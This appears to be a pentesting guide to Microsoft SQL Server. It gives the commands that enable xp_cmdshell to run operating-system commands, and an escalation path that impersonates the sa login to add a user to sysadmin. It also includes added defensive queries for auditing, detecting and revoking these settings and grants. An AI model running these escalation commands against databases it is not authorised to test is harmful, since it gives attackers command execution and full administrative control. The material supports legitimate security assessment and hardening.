Pentesting MS-SQL

MS-SQL (Microsoft SQL Server) listens on TCP port 1433 by default.

Executing Commands

xp_cmdshell

xp_cmdshell is an extended stored procedure that passes a command string to a Windows command shell on the database host and returns the shell's output as a result set. It runs in the context of the SQL Server service account (or the configured proxy account).

EXEC xp_cmdshell 'whoami'

However, xp_cmdshell is disabled by default. It can be enabled with the following commands:

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

You must have the sysadmin role to enable xp_cmdshell.
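The defender's counterpart to the procedure above, as an added example that is not part of the original page: check whether xp_cmdshell is currently enabled, return it to its default disabled state, list the logins that could re-enable it (sp_configure/RECONFIGURE need ALTER SETTINGS, which members of sysadmin and serveradmin hold implicitly), and search the SQL Server error log for the configuration-change message that sp_configure writes. Every object referenced here is a standard SQL Server catalog view or procedure; no names are assumed.

```sql
-- Added example (not from the original page): audit and harden xp_cmdshell.

-- 1. Current state. 'value' is the configured setting, 'value_in_use' is
--    what the running instance actually applies; they differ until RECONFIGURE.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');

-- 2. Disable xp_cmdshell and hide advanced options again.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;

-- 3. Logins that can flip the setting back: sysadmin and serveradmin
--    members hold ALTER SETTINGS implicitly. Compare with the expected list.
SELECT p.name, p.type_desc,
       IS_SRVROLEMEMBER('sysadmin',    p.name) AS is_sysadmin,
       IS_SRVROLEMEMBER('serveradmin', p.name) AS is_serveradmin
FROM sys.server_principals p
WHERE p.type IN ('S', 'U', 'G')          -- SQL login, Windows login, Windows group
  AND p.is_disabled = 0
  AND (IS_SRVROLEMEMBER('sysadmin', p.name) = 1
       OR IS_SRVROLEMEMBER('serveradmin', p.name) = 1)
ORDER BY p.name;

-- 4. Detection cue: each sp_configure change is logged to the SQL Server
--    error log as "Configuration option 'xp_cmdshell' changed from 0 to 1".
--    Arguments: 0 = current log, 1 = SQL Server log (2 = Agent log), filter text.
EXEC xp_readerrorlog 0, 1, N'xp_cmdshell';
```

Step 4 only covers the retained error logs; for durable evidence, forward the error log or a SQL Server Audit of server-operation events to a central log store, since an attacker with sysadmin can cycle the error log with sp_cycle_errorlog.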

MSSQL Privilege Escalation

Impersonation of other users

SQL Server has a permission called IMPERSONATE that allows a login to execute as another login (via EXECUTE AS LOGIN). If the impersonated login is more privileged, this can be used to escalate privileges.

-- Find logins you can impersonate
SELECT DISTINCT b.name
FROM sys.server_permissions a
INNER JOIN sys.server_principals b
    ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name = 'IMPERSONATE';
-- Check if the "sa" login or any other high-privileged login is listed

-- Impersonate the sa login
EXECUTE AS LOGIN = 'sa';
SELECT SYSTEM_USER;
SELECT IS_SRVROLEMEMBER('sysadmin');

Since the sa login is a member of the sysadmin role, you can impersonate sa and add your own login to the sysadmin role.

-- Add yourself to the sysadmin role
EXECUTE AS LOGIN = 'sa';
EXEC sp_addsrvrolemember '<yourUsername>', 'sysadmin';

Check whether you have been added to the sysadmin role:

SELECT IS_SRVROLEMEMBER('sysadmin');
-- Should return 1
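An audit of the escalation path described in this section, as an added example that is not from the original page: it lists every server-level IMPERSONATE grant as a grantee-to-target pair (joining on major_id, which identifies the login being impersonated, rather than on the grantor as the query above does, so the result also shows who holds the grant), flags targets that are sysadmin, dumps current sysadmin membership, shows sessions that are running under an impersonated login, and revokes a grant or removes a role member. The bracketed `<lowPrivLogin>` and `<unexpectedLogin>` are placeholders for names found by the audit queries, not real logins.

```sql
-- Added example (not from the original page): audit IMPERSONATE grants
-- and sysadmin membership, then remove what should not be there.

-- 1. Every server-level IMPERSONATE grant, who holds it and on whom.
--    class 101 = SERVER_PRINCIPAL; major_id = login being impersonated.
SELECT grantee.name AS grantee,
       target.name  AS can_impersonate,
       IS_SRVROLEMEMBER('sysadmin', target.name) AS target_is_sysadmin,
       pe.state_desc
FROM sys.server_permissions pe
JOIN sys.server_principals grantee ON pe.grantee_principal_id = grantee.principal_id
JOIN sys.server_principals target  ON pe.major_id = target.principal_id
WHERE pe.class = 101
  AND pe.permission_name = 'IMPERSONATE'
ORDER BY target_is_sysadmin DESC, grantee.name;

-- 2. Current sysadmin members, to diff against the approved list.
SELECT m.name AS member, m.type_desc, m.is_disabled
FROM sys.server_role_members rm
JOIN sys.server_principals r ON rm.role_principal_id   = r.principal_id
JOIN sys.server_principals m ON rm.member_principal_id = m.principal_id
WHERE r.name = 'sysadmin'
ORDER BY m.name;

-- 3. Live detection: while EXECUTE AS LOGIN is in effect, login_name is the
--    impersonated login and original_login_name is the real one.
SELECT session_id, original_login_name, login_name, host_name, program_name
FROM sys.dm_exec_sessions
WHERE original_login_name <> login_name;

-- 4. Remediation. Revoke a grant that lets a low-privileged login become sa
--    ('<lowPrivLogin>' is a placeholder for a grantee from step 1) ...
REVOKE IMPERSONATE ON LOGIN::sa FROM [<lowPrivLogin>];

-- ... and remove a member that should not be in sysadmin
--    ('<unexpectedLogin>' is a placeholder for a name from step 2).
ALTER SERVER ROLE sysadmin DROP MEMBER [<unexpectedLogin>];
```

Step 3 only catches impersonation that is active at the moment the query runs; the same original_login_name/login_name mismatch is available in SQL Server Audit and Extended Events session data if a historical record is needed. Also note that the sa login is commonly disabled on hardened instances, but a disabled login can still be impersonated through EXECUTE AS LOGIN, so the grants in step 1 matter regardless of whether sa can log in directly.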